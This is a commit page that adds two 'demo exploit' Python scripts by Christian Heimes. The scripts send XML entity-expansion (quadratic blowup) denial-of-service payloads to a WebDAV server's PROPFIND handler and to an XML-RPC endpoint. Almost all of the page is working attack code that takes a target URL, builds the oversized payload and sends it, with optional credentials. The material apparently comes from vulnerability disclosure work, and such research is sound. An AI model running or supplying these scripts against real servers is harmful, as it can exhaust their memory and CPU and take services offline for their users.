Commits

Christian Heimes  committed 9cb6ab6

add demo exploits for webdav and xmlrpc

  • Participants
  • Parent commits 6f66d6e

Comments (0)

Files changed (2)

File other/exploit_webdav.py

+#!/usr/bin/python
+"""Demo exploit for WebDAV DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import base64
+import urlparse
+import httplib
+
+if len(sys.argv) != 2:
+    sys.exit("{} http://user:password@host:port/".format(sys.argv[0]))
+
+url = urlparse.urlparse(sys.argv[1])
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+ <propfind xmlns="DAV:">
+   <prop>QUAD
+    <supported-live-property-set/>
+    <supported-method-set/>
+    </prop>
+</propfind>
+"""
+
+xml = xml.replace("VALUE", "a" * 30000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {
+    "Content-Type": "text/xml",
+    "Content-Length": len(xml),
+    "Depth": 1,
+    }
+
+if url.username:
+    auth = base64.b64encode(":".join((url.username, url.password)))
+    headers["Authorization"] = "Basic %s" % auth
+
+con = httplib.HTTPConnection(url.hostname, int(url.port))
+con.request("PROPFIND", url.path, body=xml, headers=headers)
+res = con.getresponse()
+print(res.read())

File other/exploit_xmlrpc.py

+#!/usr/bin/python
+"""Demo exploit for XML-RPC DoS attack
+
+Author: Christian Heimes
+"""
+import sys
+import urllib2
+
+if len(sys.argv) != 2:
+    sys.exit("{} url".format(sys.argv[0]))
+
+url = sys.argv[1]
+
+xml = """<?xml version='1.0'?>
+<!DOCTYPE bomb [
+<!ENTITY a "VALUE">
+]>
+<methodCall>
+<methodName>system.methodSignature</methodName>
+<params>
+<param>
+<value><string>QUAD</string></value>
+</param>
+</params>
+</methodCall>
+"""
+
+xml = xml.replace("VALUE", "a" * 100000)
+xml = xml.replace("QUAD", "&a;" * 1000)
+
+headers = {"Content-Type": "text/xml", "Content-Length": len(xml)}
+
+req = urllib2.Request(url, data=xml, headers=headers)
+
+print("Sending request to {}".format(url))
+
+resp = urllib2.urlopen(req)
+
+print("Response")
+print(resp.read())